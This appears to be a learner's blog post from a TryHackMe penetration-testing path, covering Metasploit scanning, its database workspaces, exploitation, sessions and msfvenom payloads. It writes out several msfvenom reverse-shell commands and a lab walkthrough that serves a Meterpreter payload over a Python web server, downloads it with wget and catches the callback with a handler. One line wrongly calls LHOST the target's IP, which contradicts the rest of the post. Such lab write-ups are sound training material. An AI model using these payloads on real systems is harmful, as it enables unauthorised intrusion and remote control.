, , , ,
Metasploit logo

Day 055 #FromZeroToHacker – Metasploit Exploitation

Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation.

Let’s start our daily #FromZeroToHacker challenge.

Table of contents
Introduction
What have I learnt today?
Stats
Resources

Introduction to Metasploit Exploitation

Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation.

We will also cover how the database feature makes it easier to manage penetration testing engagements with a broad scope. Also, we will generate payloads with msfvenom and start a Meterpreter session on most target platforms

What have I learnt today?

Scanning

Port scanning

We can list all the modules that scan open ports using the search portscan command.

Search portscan

We can load one module using use <NUMBER> as we saw in yesterday’s lesson and make Metasploit list all the options available:

Use show options

We need to set up values for 7 options! Luckily, most of them have a default value.

But we can also run nmap from Metasploit too:

Metasploit nmap

UDP service identification

The scanner module scanner/discovery/udp_sweep will allow you to quickly identify services running over the UDP (User Datagram Protocol). While it doesn’t run an extensive scan of all possible UPD services, provides a quick way to identify services such as DNS or NetBIOS:

UDP Scan

SMB Scans

Metasploit also offers auxiliary modules that allow us to scan specific services. For example, SMB (Server Message Block, from Windows). Let’s see an example of scanner/smb/smb_version:

SMB Version

We shouldn’t omit exotic services such as NetBIOS (Network Basic Input Output System), as it allows computers to communicate with each other over the network, to share or send files to printers. For example, the NetBIOS name could reveal important information such as the role of the computer (DEV-OPS, SALES, CEO). We can also find shared files and folders that could be accessed either without a password or protected with a simple password (admin, administrator, 1234…).

Metasploit has many modules that can help us have a better understanding of the target system: It is always worth performing a quick search to see if we can find extra information.

The Metasploit Database

Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values. First, we need to start a PostgreSQL database with systemctl start postgresql. Then, we start the Metasploit Database with msfdb init.

Then, launch msfconsole and check the database status with db_status:

Metasploit launch_db
Metasploit db_status

Now, we can create different workspaces to isolate different projects. We should be in the default workspace:

Metasploit Workspace

Add a new workspace with -a <NAME> or delete an existing one with -d <NAME>:

Workspace management

We can navigate between workspaces with workspace <WORKSPACE_NAME>:

Workspace navigation

You can use workspace -h to list all the options available:

Workspace help

If we run a module, for example, db_nmap, all results will be saved to the database:

We can reach now the information relevant to hosts and services with the hosts and services commands:

host services

Example overflow

  1. We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with use auxiliary/scanner/smb/smb_ms17_010 command.
  2. Set the RHOSTS value using hosts -R.
  3. Check if all values are assigned correctly with show options.
  4. Launch the exploit with exploit or run.

You may want to look for classic vulnerabilities in:

  • HTTP: Could potentially host a web application where you can find SQL vulnerabilities or RCE.
  • FTP: Could allow anonymous login.
  • SMB: It may be vulnerable to SMB exploits like MS17-010.
  • SSH: Could have default or easy-to-guess credentials.
  • RDP: It may be vulnerable to Bluekeep or allow desktop access if weak credentials are used.

Vulnerability scanning

Metasploit allows you to identify easy critical vulnerabilities or low-hanging fruit. For example, if we identify a VNC service, we may use search vnc on Metasploit to list useful modules.

We can use info in any module to have more information about how it works, how to use it, its purpose, etc:

Metasploit module info

Exploitation

Exploits is the most populated module category. Not a surprise, since Metasploit is an exploitation framework.

We have used search to search for exploits, info to dump more info about the exploit, and finally, we launched it with exploit or run.

This process seems simple, but a successful outcome depends on a great understanding of the services running on the target system.

Most exploits have a preset default payload that we can list with show payloads:

Module Show payloads

Once we have decided on the payload, we can select it with set payload <NUMBER>:

![[day_055_set_payload.png]]

Remember that finding a working payload can become a trial-and-error process due to firewalls, anti-virus, configurations, etc.

Some payloads will open new parameters that we need to set; running show options will display them.

Let’s run the exploit: This will create a session. This session can be backgrounded using CTRL+Z or aborting it with CTRL+C.

Backgrounding a session will be useful when working on more than one target at the same time, or using the same target but with a different exploit.

Backgrounding a session

Working with sessions

The sessions command will list all the active sessions (like the one we just backgrounded). sessions -i <NUMBER> will foreground or load the session selected.

Sessions listing and selecting

Msfvenom

Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads. Msfvenom will allow you to create payloads in many different formats (.php, .exe, .dll, .elf, etc) and for many different target systems (Linux, Windows, Android, etc).

MSfvenom

Output formats

We can generate either stand-alone payloads (executables for Meterpreter) or a usable raw format (python, php…). msfvenom --list formats command can be used to list supported output formats.

Msfvenom list commands

Encoders

As the name says, this encodes the payload. Despite some beliefs, this is not used to bypass antivirus, as there are better options for that.

Handlers

Sometimes we need to be able to intercept incoming connections generated by the Msfvenom payload to create a reverse shell. This is automatically handled by the exploit module. Reverse shells or Meterpreter callbacks generated in our MSFvenom payload can be easily caught using a handler.

Imagine that we want to exploit a file upload vulnerability present in DVWA (Damn Vulnerable Web Application). The exploit steps are:

  1. Generate the PHP shell using Msfvenom.
  2. Start the Metasploit handler.
  3. Execute the PHP shell.

Msfvenom requires a payload, the local machine IP address, and the local port that will be used as a listener:

PHP reverse shell

Warning: The output PHP file misses the starting PHP tag. This file should be edited to convert it into a working PHP file.

Starting PHP
Ending PHP

With the reverse shell code created, we can use Multi Handler to receive the incoming connection with use exploit/multi/handler.

Multi handler options

Now, we just need to run the handler and wait for the incoming connection.

Other payloads

Depending on the target configuration (OS, webserver, etc) msfvenom can be used to create payloads in almost all formats.

In all these examples, LHOST is the target’s IP, and LPORT is the port where our handler will listen.

Linux Executable and Linkable Format (.elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LP

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f elf > <FILENAME>.elf
The .elf format is executable for Linux. Remember to use chmod +x <FILENAME>.elf to give executable permissions. Then, ./<FILENAME>.elf to run the code.

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f asp > <FILENAME>.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.py

All of these examples are reverse payloads, meaning that we will need to have the exploit/multi/handler module listening on our attacking machine. Remember to set up the payload, LHOST and LPORT parameters.

This is an example of an attack using msfvenom:

First, we create a meterpreter payload in the .elf format and we give it permissions:

Msfvenom step 1

Then, we start a Python web server to serve the file to the target computer once we are inside:

Msfvenom step 2

Then, we login inside the target computer with SSH:

Msfvenom step 2

Once we are inside, get permission to download the file and download it with wget:

Msfvenom step 4

The file is transferred. Stop the python3 server and instead start msfconsole, use exploit/multi/handler, configure it using the payload, the IP and the port values we used during the creation of the payload during the first step, then run it to create a listener:

Msfvenom step 5

Now, give permissions to the .elf file downloaded, run it and your msfconsole will get a meterpreter line: The hack has been successful 🙂

Msfvenom step 6

Summary

Things we learned today:

  • How to scan target systems using Metasploit.
  • How to use the Metasploit database feature.
  • How to use Metasploit to conduct a vulnerability scan.
  • How to use Metasploit to exploit vulnerable services on target systems.
  • How msfvenom can be used to create payloads and obtain a Meterpreter session on the target system.

Stats

From 77.283th to 76.355th.

Here is also the Skill Matrix:

Skills Matrix

Resources

Path: Jr Penetration tester

Metasploit

TryHackMe: Metasploit Exploitation

Other resources

Metasploit: Introduction
SQL Injection attacks
What the Shell? Part 2